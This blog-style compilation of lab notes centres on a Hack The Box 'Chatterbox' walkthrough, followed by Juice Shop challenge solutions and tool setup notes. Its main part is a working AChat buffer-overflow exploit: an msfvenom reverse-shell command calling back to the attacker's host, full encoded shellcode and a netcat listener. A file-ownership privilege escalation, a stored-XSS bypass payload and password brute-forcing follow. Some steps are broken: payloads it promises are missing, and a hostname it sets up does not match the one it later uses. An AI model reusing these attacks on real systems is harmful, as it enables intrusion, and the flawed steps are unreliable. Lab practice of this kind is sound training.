Hackthebox Chatterbox Walkthrough

Explanation

Hack The Box is a platform that hosts vulnerable machines reachable over its own VPN.
This is a walkthrough of the box “Chatterbox”.

Solution

1. Initial Enumeration

TCP Port Scanning:

root@kali:~# nmap -p- 10.10.10.74 -sC -sV
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-28 19:34 EET
Nmap scan report for 10.10.10.74
Host is up (0.045s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
9255/tcp open  http    AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   AChat chat system

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 618.82 seconds

root@kali:~#

2. Getting User

Running searchsploit against the service name turns up two exploits for this AChat version: a Metasploit module and a standalone Python script.

root@kali:~# searchsploit achat
--------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                             |  Path
                                                                           | (/usr/share/exploitdb/)
--------------------------------------------------------------------------- ----------------------------------------
Achat 0.150 beta7 - Remote Buffer Overflow                                 | exploits/windows/remote/36025.py
Achat 0.150 beta7 - Remote Buffer Overflow (Metasploit)                    | exploits/windows/remote/36056.rb
MataChat - 'input.php' Multiple Cross-Site Scripting Vulnerabilities       | exploits/php/webapps/32958.txt
Parachat 5.5 - Directory Traversal                                         | exploits/php/webapps/24647.txt
--------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result

root@kali:~#

This time the standalone script “36025.py” was used.
It expects a reverse-shell payload, so that is generated with msfvenom first.

root@kali:~# msfvenom -p windows/shell_reverse_tcp RHOST=10.10.10.74 LHOST=10.10.14.10 LPORT=4443 exitfunc=thread -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes

root@kali:~# 

Then paste the generated buf into the exploit script in place of its own payload. The script is Python 2 code (note the print statement), which is what python runs on this Kali release.

# Exploit-DB 36025.py, a Python 2 script (print statement below)
import socket
import sys, time

# Reverse-shell payload generated by the msfvenom command above
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x6b\x38\x75\x32"
buf += b"\x6d\x30\x49\x70\x49\x70\x61\x50\x43\x59\x49\x55\x50"
buf += b"\x31\x55\x70\x30\x64\x44\x4b\x6e\x70\x30\x30\x72\x6b"
buf += b"\x51\x42\x4a\x6c\x64\x4b\x61\x42\x4b\x64\x32\x6b\x30"
buf += b"\x72\x4b\x78\x4a\x6f\x64\x77\x50\x4a\x4b\x76\x6c\x71"
buf += b"\x79\x6f\x46\x4c\x4f\x4c\x33\x31\x61\x6c\x7a\x62\x6c"
buf += b"\x6c\x6d\x50\x77\x51\x48\x4f\x5a\x6d\x6b\x51\x56\x67"
buf += b"\x47\x72\x5a\x52\x61\x42\x72\x37\x74\x4b\x30\x52\x4e"
buf += b"\x30\x42\x6b\x6e\x6a\x6d\x6c\x62\x6b\x50\x4c\x6b\x61"
buf += b"\x62\x58\x6a\x43\x50\x48\x4a\x61\x78\x51\x52\x31\x52"
buf += b"\x6b\x31\x49\x4f\x30\x7a\x61\x37\x63\x42\x6b\x61\x39"
buf += b"\x5a\x78\x37\x73\x6e\x5a\x6e\x69\x44\x4b\x30\x34\x44"
buf += b"\x4b\x7a\x61\x36\x76\x6d\x61\x59\x6f\x44\x6c\x59\x31"
buf += b"\x78\x4f\x6a\x6d\x49\x71\x59\x37\x4c\x78\x57\x70\x51"
buf += b"\x65\x4b\x46\x6d\x33\x61\x6d\x68\x78\x4d\x6b\x61\x6d"
buf += b"\x6f\x34\x31\x65\x7a\x44\x51\x48\x64\x4b\x6f\x68\x6c"
buf += b"\x64\x59\x71\x36\x73\x73\x36\x54\x4b\x7a\x6c\x30\x4b"
buf += b"\x62\x6b\x61\x48\x4d\x4c\x4a\x61\x56\x73\x42\x6b\x6c"
buf += b"\x44\x42\x6b\x6b\x51\x6a\x30\x52\x69\x4f\x54\x4d\x54"
buf += b"\x4f\x34\x6f\x6b\x6f\x6b\x63\x31\x52\x39\x71\x4a\x4e"
buf += b"\x71\x69\x6f\x47\x70\x6f\x6f\x6f\x6f\x71\x4a\x44\x4b"
buf += b"\x4a\x72\x7a\x4b\x52\x6d\x71\x4d\x50\x68\x50\x33\x4e"
buf += b"\x52\x59\x70\x6b\x50\x32\x48\x54\x37\x63\x43\x30\x32"
buf += b"\x4f\x6f\x62\x34\x43\x38\x6e\x6c\x71\x67\x4f\x36\x4b"
buf += b"\x57\x49\x6f\x36\x75\x74\x78\x54\x50\x6b\x51\x6d\x30"
buf += b"\x6b\x50\x4b\x79\x75\x74\x62\x34\x32\x30\x72\x48\x4b"
buf += b"\x79\x53\x50\x30\x6b\x6d\x30\x59\x6f\x68\x55\x52\x30"
buf += b"\x72\x30\x62\x30\x6e\x70\x31\x30\x30\x50\x4d\x70\x32"
buf += b"\x30\x43\x38\x37\x7a\x4c\x4f\x79\x4f\x67\x70\x59\x6f"
buf += b"\x37\x65\x32\x77\x4f\x7a\x4a\x65\x4f\x78\x6b\x5a\x6c"
buf += b"\x4a\x6c\x4e\x4a\x6a\x51\x58\x59\x72\x59\x70\x6a\x71"
buf += b"\x6f\x6b\x32\x69\x7a\x46\x62\x4a\x6c\x50\x31\x46\x4f"
buf += b"\x67\x43\x38\x32\x79\x54\x65\x70\x74\x63\x31\x79\x6f"
buf += b"\x56\x75\x74\x45\x67\x50\x54\x34\x6a\x6c\x6b\x4f\x50"
buf += b"\x4e\x4d\x38\x44\x35\x38\x6c\x4f\x78\x6c\x30\x34\x75"
buf += b"\x75\x52\x51\x46\x4b\x4f\x37\x65\x43\x38\x6f\x73\x70"
buf += b"\x6d\x6f\x74\x79\x70\x61\x79\x49\x53\x30\x57\x70\x57"
buf += b"\x71\x47\x70\x31\x68\x76\x61\x5a\x4c\x52\x32\x39\x6e"
buf += b"\x76\x47\x72\x39\x6d\x30\x66\x46\x67\x4f\x54\x6c\x64"
buf += b"\x6d\x6c\x4b\x51\x59\x71\x62\x6d\x4d\x74\x4b\x74\x4e"
buf += b"\x30\x46\x66\x79\x70\x4e\x64\x50\x54\x4e\x70\x71\x46"
buf += b"\x6e\x76\x62\x36\x71\x36\x6f\x66\x50\x4e\x52\x36\x51"
buf += b"\x46\x32\x33\x42\x36\x51\x58\x33\x49\x76\x6c\x4f\x4f"
buf += b"\x51\x76\x4b\x4f\x5a\x35\x43\x59\x57\x70\x30\x4e\x50"
buf += b"\x56\x6e\x66\x6b\x4f\x6e\x50\x43\x38\x7a\x68\x64\x47"
buf += b"\x6b\x6d\x53\x30\x59\x6f\x69\x45\x65\x6b\x57\x70\x4d"
buf += b"\x4d\x6c\x6a\x49\x7a\x33\x38\x73\x76\x65\x45\x45\x6d"
buf += b"\x63\x6d\x39\x6f\x57\x65\x4f\x4c\x4a\x66\x71\x6c\x39"
buf += b"\x7a\x61\x70\x4b\x4b\x69\x50\x72\x55\x79\x75\x37\x4b"
buf += b"\x61\x37\x4a\x73\x63\x42\x70\x6f\x52\x4a\x69\x70\x31"
buf += b"\x43\x39\x6f\x58\x55\x41\x41"

# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = ('10.10.10.74', 9256)

fs = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
p  = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
p += "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
p += "\x62" + "A"*45
p += "\x61\x40" 
p += "\x2A\x46"
p += "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
p += "\x61\x43" + "\x2A\x46"
p += "\x2A" + fs + "C" * (157-len(fs)- 31-3)
p += buf + "A" * (1152 - len(buf))
p += "\x00" + "A"*10 + "\x00"

print "---->{P00F}!"
i=0
while i<len(p):
    if i > 172000:
        time.sleep(1.0)
    sent = sock.sendto(p[i:(i+8192)], server_address)
    i += sent
sock.close()

To catch the reverse shell, start a netcat listener on the port given as LPORT (4443) and then run the modified exploit.

root@kali:~# nc -nlvp 4443
listening on [any] 4443 ...
root@kali:~# python 36025.py 
---->{P00F}!

root@kali:~#

The listener receives a shell running as the user “alfred”.

root@kali:~# nc -nlvp 4443
listening on [any] 4443 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.74] 49160
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
chatterbox\alfred

C:\Windows\system32>

The user flag “user.txt” is in the directory “C:\Users\Alfred\Desktop”.

C:\Users\Alfred\Desktop>type user.txt
type user.txt
72290246dfaedb1e3e3ac9d6fb306334

C:\Users\Alfred\Desktop>

3. Getting Root

Although Alfred is only an ordinary user, we can change into the Administrator profile directory; reading root.txt there is still denied.

C:\Users\Administrator\Desktop>whoami
whoami
chatterbox\alfred

C:\Users\Administrator\Desktop>type root.txt
type root.txt
Access is denied.

C:\Users\Administrator\Desktop>

The “icacls” command shows that Alfred has the following permissions on the directory “C:\Users\Administrator”:

  1. (F): Full Permission
  2. (OI): Object Inheritance (Permission for this folder and subfolders)
  3. (CI): Container Inheritance (Permission for files in this folder and subfolders)

C:\Users>icacls administrator
icacls administrator
administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
              CHATTERBOX\Administrator:(OI)(CI)(F)
              BUILTIN\Administrators:(OI)(CI)(F)
              CHATTERBOX\Alfred:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users>

On the other hand, the ACL of “root.txt” contains no entry for Alfred at all:

C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>

However, “dir /Q”, which lists the owner of each file, shows that root.txt is owned by Alfred.
I was wondering how “Q” could stand for “ownership”, but that’s how it is.

C:\Users\Administrator\Desktop>dir /Q
dir /Q
 Volume in drive C has no label.
 Volume Serial Number is 9034-6528

 Directory of C:\Users\Administrator\Desktop

12/10/2017  06:50 PM    <DIR>          BUILTIN\Administrators .
12/10/2017  06:50 PM    <DIR>          NT AUTHORITY\SYSTEM    ..
12/10/2017  06:50 PM                32 CHATTERBOX\Alfred      root.txt
               1 File(s)             32 bytes
               2 Dir(s)  17,933,189,120 bytes free

C:\Users\Administrator\Desktop>

Because the owner of a file can always rewrite its permissions, Alfred can grant himself access to “root.txt” and then read it.

C:\Users\Administrator\Desktop>icacls root.txt /grant alfred:(F)   
icacls root.txt /grant alfred:(F)
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>icacls root.txt
icacls root.txt
root.txt CHATTERBOX\Alfred:(F)
         CHATTERBOX\Administrator:(F)

Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>type root.txt
type root.txt
a673d1b1fa95c276c5ef2aa13d9dcc7c
C:\Users\Administrator\Desktop>
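The misconfiguration this box turns on, a non-administrative account holding an inheritable Full-control entry on another user's profile, is something a defender can check for in icacls output. The following Python script is an added example, not part of the original walkthrough: it parses icacls output (assuming path names without spaces, as here) and reports entries that grant Full control or Modify to anyone outside a small allow-list, run over a sample constructed from the output shown above.

```python
import re

# Assumed allow-list: principals expected to hold Full control on a user profile
# directory. Adjust per host; anything else with (F) or (M) is reported.
PRIVILEGED = {
    "NT AUTHORITY\\SYSTEM",
    "BUILTIN\\Administrators",
}

# One ACE as icacls prints it: "<DOMAIN\\principal>:(flag)(flag)...", where the
# flags include inheritance markers such as (OI)(CI) and rights such as (F) or (M).
ACE_RE = re.compile(r"^(?P<who>[^:]+):(?P<flags>(?:\([A-Z,]+\))+)$")


def parse_icacls(output):
    """Parse icacls text output into (path, principal, [flags]) tuples.

    The first ACE of a path shares its line with the path name; further ACEs
    follow on indented continuation lines. Status lines are skipped.
    """
    entries, path = [], None
    for raw in output.splitlines():
        if ":(" not in raw:                    # blank lines and status messages
            continue
        if raw[:1].isspace():                  # continuation ACE for the current path
            rest = raw.strip()
        else:                                  # "<path> <principal>:<flags>"
            path, _, rest = raw.strip().partition(" ")
        m = ACE_RE.match(rest)
        if not m:
            raise ValueError("unrecognised icacls line: %r" % raw)
        flags = re.findall(r"\(([A-Z,]+)\)", m.group("flags"))
        entries.append((path, m.group("who"), flags))
    return entries


def risky_aces(output, profile_owner, privileged=PRIVILEGED):
    """Return (path, principal, scope) for every ACE granting Full control (F)
    or Modify (M) to a principal that is neither the profile owner nor on the
    privileged allow-list."""
    findings = []
    for path, who, flags in parse_icacls(output):
        rights = set(flags)
        if not ({"F", "M"} & rights) or who in privileged:
            continue
        if who.split("\\")[-1].lower() == profile_owner.lower():
            continue
        # (OI)/(CI) mean the ACE is passed down to child files/folders
        scope = "inheritable" if {"OI", "CI"} & rights else "this object only"
        findings.append((path, who, scope))
    return findings


# Sample constructed from the icacls output shown in the walkthrough.
SAMPLE = """administrator NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
              CHATTERBOX\\Administrator:(OI)(CI)(F)
              BUILTIN\\Administrators:(OI)(CI)(F)
              CHATTERBOX\\Alfred:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for path, who, scope in risky_aces(SAMPLE, profile_owner="Administrator"):
        print("%s: %s holds Full/Modify (%s)" % (path, who, scope))
```

The root.txt case would not show up in this check: its ACL lists only Administrator, and Alfred's access comes from file ownership, which carries the right to rewrite the permissions. An ownership audit (dir /Q, or Get-Acl in PowerShell) is needed alongside it.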

Running OWASP Security Shepherd with Docker compose on Kali 2019.4

Explanation

OWASP Security Shepherd is a deliberately vulnerable web application for practice.
Compared with other vulnerable web apps such as DVWA, Juice Shop and WebGoat, it:

  1. also has challenges for mobile application security
  2. focuses on flaws in how the application’s “spec” is implemented, rather than on textbook XSS, SQLi and so on
  3. puts more emphasis on working with a local proxy (such as Burp Suite) and on request validation

There are several ways to set the platform up; this time Docker Compose was used.
This is a personal memo of the setup procedure.

Environment

  • OS: Kali Linux 2019.4
  • Docker: 19.03.4
  • OWASP Security Shepherd: v3.2

Solution

1. Installing prerequisites

root@kali:~# apt-get install docker.io docker-compose default-jdk maven

---

root@kali:~# git clone https://github.com/OWASP/SecurityShepherd.git

2. Initial setup

root@kali:~# cd SecurityShepherd/

root@kali:~/SecurityShepherd# mvn -Pdocker clean install -DskipTests

root@kali:~/SecurityShepherd# service docker start

root@kali:~/SecurityShepherd# docker-compose up -d # -d detaches, so the terminal is returned

---

3. Login

We can log in with the following default credentials.

admin:password

After logging in, change the password.

Now we can start the challenges.
Clicking “Get Next Challenge” takes us to the next challenge.

The first challenge is about modifying an HTTP request with a local proxy.

4. Select Open Floor mode

To see all challenges at once, switch to “Open Floor mode”.
Click “Admin” and go to “Module Management” -> “Challenge Module Layout”.
Enable “Open Floor mode” by clicking the button.

5. Remove Docker container

# stop all docker containers
root@kali:~/SecurityShepherd# docker-compose stop

# remove all docker containers
root@kali:~/SecurityShepherd# docker-compose down

# remove all docker containers and Security Shepherd images
root@kali:~/SecurityShepherd# docker-compose down --rmi all

# rebuild
root@kali:~/SecurityShepherd# docker-compose build

---

root@kali:~/SecurityShepherd# docker-compose up -d

Install Burp extension reflector

Explanation

To automate the search for reflected parameters (a first step in reflected XSS testing), install the Burp extension “Reflector”.

Environment

  • OS: Kali Linux 2019.4
  • Burp Suite: Burp Suite Community Edition v2.1.04
  • Plugin: reflector 2.1

Solution

1. Setting up Burp Suite

First, download the .jar file from https://github.com/elkokc/reflector/releases.

Then launch Burp Suite and go to the “Extender” -> “Extensions” tab.
Click “Add” and select “reflector2.1” as the “Extension file”.

A new “Reflector” tab now appears.

Writeup of OWASP Juice Shop 2 stars challenge

Explanation

OWASP Juice Shop is one of the vulnerable applications from OWASP, written in Node.js, Express and Angular for practice.
It contains a vast number of hacking challenges, rated from 1 star to 5 stars.
This is a writeup of the 2-star challenges.

Environment

  • OS: Kali Linux 2019.4
  • OWASP Juice Shop: v9.3.0

Solution

1. Admin Section

Access the administration section of the store.

This is a guessing task.
Browsing to http://localhost:3000/#/administration solves it.

2. Classic Stored XSS

Prerequisite

Log in as a user

Perform an XSS attack with <script>alert(xss)</script> on a legacy page within the application.

Log in as any user and go to http://localhost:3000/#/profile.
Set “<script>alert('xss')</script>” as the username and submit; the input is sanitized before it is shown again.

That sanitization is not enough, though.
Submitting the following payload instead results in a stored XSS:

<<script>ascript>alert('xss')</script>

3. Deprecated Interface

Prerequisite

Log in as a user

Use a deprecated B2B interface that was not properly shut down.

Go to http://localhost:3000/#/complain.
Uploading an XML file there completes the challenge; the file used:

root@kali:~# cat note.xml 
<note nighteye="disabled">
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>

root@kali:~# 

4. Five-Star Feedback

Prerequisite

Log in as a user

Get rid of all 5-star customer feedback.

After logging in, go to http://localhost:3000/#/administration, which we found in the first challenge, and delete every 5-star feedback entry with its trash-bin button.

5. Login Admin

Log in with the administrator’s user account.

The login form is vulnerable to SQL injection.
Go to http://localhost:3000/#/login and submit the following username with any password.
We are then logged in as the user “admin@juice-sh.op”.

6. Login MC SafeSearch

Log in with MC SafeSearch’s original user credentials without applying SQL Injection or any other bypass.

This is a guessing task, which I don’t like.
Googling ‘MC SafeSearch’ leads to this video.
In it we learn that the name of MC’s dog is “Mr.Noodles”.
With the following credentials we can log in as the user “mc.safesearch”.

mc.safesearch@juice-sh.op:Mr. N00dles

7. Password Strength

Prerequisite

2 star Challenge 5: “Login Admin”

Log in with the administrator’s user credentials without previously changing them or applying SQL Injection.

If the prerequisite is done, we already know that the username is “admin@juice-sh.op”.
Launch Burp Suite, go to http://localhost:3000/#/login and try to log in with a random password.
The login request then shows up in Burp’s traffic.

This time, use Burp Intruder.
First, right-click the request and choose “Send to Intruder”.
In the “Positions” tab, mark only the “password” value as the payload position.

Next, go to the “Payloads” tab and load “/usr/share/dirb/wordlists/others/best1050.txt”.

Then start the attack.

Filtering the results (a successful login returns a different status and length) reveals the correct password, “admin123”.

8. Security Policy

Prerequisite

Log in as a user

Behave like any “white-hat” should before getting into the action.

All we have to do is go to “Account” -> “Privacy & Security” -> “Privacy Policy”.

9. View Basket

Prerequisite

Log in as a user

View another user’s shopping basket.

Launch Burp Suite and open http://localhost:3000/#/basket to capture the request that fetches our own basket.
The basket id in the URI is not tied to the logged-in session: changing it to “/rest/basket/2” (with Burp Repeater or any other tool) and resending the request returns another user’s basket and clears the challenge.

10. Weird Crypto

Prerequisite

Log in as a user

Inform the shop about an algorithm or library it should definitely not use the way it does.

Sending the following message completes the challenge.

Burp interception for localhost application with FoxyProxy

Explanation

To route only a local application’s traffic through Burp, install the browser extension “FoxyProxy”.
Here it was used for OWASP Juice Shop running on localhost:3000.

Environment

  • OS: Kali Linux 2019.4
  • Burp Suite: Burp Suite Community Edition v2.1.04
  • Browser: Google Chrome 78.0.3904.108 (Official Build) (64-bit)
  • FoxyProxy: FoxyProxy Standard 3.0.7.1

Solution

1. Installing FoxyProxy

First, go to the Chrome Web Store and install the FoxyProxy extension.

2. Launch Burp Suite

Next, launch Burp Suite.
The default proxy listener (IP: 127.0.0.1, port: 8080) was used.

3. Edit “/etc/hosts”

Add the following line to “/etc/hosts” to give localhost the additional name “juice-shop”.
(The name “localhost” itself can’t be used for this, because the browser bypasses the proxy for it.)

127.0.0.1 juice-shop

4. Setup FoxyProxy

Then click the extension icon on the right of the Chrome toolbar and select “Options”.
Click “Add New Proxy” to open the “Proxy Settings” window.
Under “Proxy Details”, enter the address and port of the running Burp Suite listener.

Next, go to “URL Patterns” and click “Add New Pattern”.
A wildcard can be used for the domain name that should go through the proxy.

Finally, go to the top page of the FoxyProxy configuration and enable the proxy.
Choose “Use proxies based on their pre-defined patterns and priorities” as the proxy mode.

5. Check the configuration with Burp Suite

Open “http://sec-juice:3000” in Google Chrome and look at the “HTTP history” tab in Burp Suite.
The requests to the local application now appear there, so they can be intercepted and analyzed.